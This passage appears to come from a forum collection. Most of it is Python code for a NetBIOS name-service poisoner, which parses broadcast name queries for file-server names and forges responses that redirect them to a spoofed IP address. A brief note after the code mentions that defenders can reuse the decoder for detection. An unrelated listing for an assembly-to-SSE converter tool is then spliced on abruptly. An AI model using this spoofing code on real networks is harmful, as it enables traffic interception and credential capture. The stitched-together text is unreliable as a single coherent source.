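    return bytes(b for x in raw for b in (0x41 + (x >> 4), 0x41 + (x & 0x0F)))


def decode_netbios_name(encoded: bytes):
    """Inverse of encode_netbios_name: returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_name_query(txid: int, name: str, suffix: int) -> bytes:
    """Broadcast NB name query (flags 0x0110: opcode query, RD, B)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    question = b"\x20" + encode_netbios_name(name, suffix) + b"\x00" + struct.pack(">HH", QTYPE_NB, QCLASS_IN)
    return header + question


def parse_name_query(pkt: bytes):
    """Return {txid, name, suffix, service} for a single-question NB query, else None."""
    if len(pkt) < 50:
        return None
    txid, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1 or pkt[12] != 0x20 or pkt[45] != 0x00:
        return None                       # a response, or not a one-label NB question
    qtype, qclass = struct.unpack(">HH", pkt[46:50])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    name, suffix = decode_netbios_name(pkt[13:45])
    return {"txid": txid, "name": name, "suffix": suffix,
            "service": SUFFIX_NAMES.get(suffix, "unknown")}


def should_answer(query, answer_workstation: bool = False) -> bool:
    """Default: only File Server Service (SMB) lookups; answer_workstation mirrors '-r'."""
    wanted = {SUFFIX_FILE_SERVER} | ({SUFFIX_WORKSTATION} if answer_workstation else set())
    return query is not None and query["suffix"] in wanted


def build_poisoned_response(query, spoofed_ip: str, ttl: int = 165) -> bytes:
    """Positive name query response (flags 0x8500) claiming the name lives at spoofed_ip."""
    header = struct.pack(">HHHHHH", query["txid"], 0x8500, 0, 1, 0, 0)
    rr_name = b"\x20" + encode_netbios_name(query["name"], query["suffix"]) + b"\x00"
    rdata = b"\x00\x00" + bytes(int(o) for o in spoofed_ip.split("."))  # NB_FLAGS (B-node, unique) + IPv4
    return header + rr_name + struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, ttl, len(rdata)) + rdata


if __name__ == "__main__":
    q = parse_name_query(build_name_query(0x1234, "FILESRV", SUFFIX_FILE_SERVER))
    print(q, "answer:", should_answer(q))
    print(build_poisoned_response(q, "10.0.0.5").hex())   # spoofed_ip is an arbitrary demo value
```

Restricting replies to suffix 0x20 is what keeps the poisoner from interfering with browser elections and workstation registrations that use other suffixes; a defender watching UDP/137 can apply the same decoder to flag hosts that answer NB queries for names they do not own.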
  24. Translate regular Assembly into Extended Instructions SSEXY - Convert x86 Instruction into their SSE equivalent. For more information; read the slides and summary which can be found here. http://jbremer.org/ssexy.zip Sursa: https://github.com/jbremer/ssexy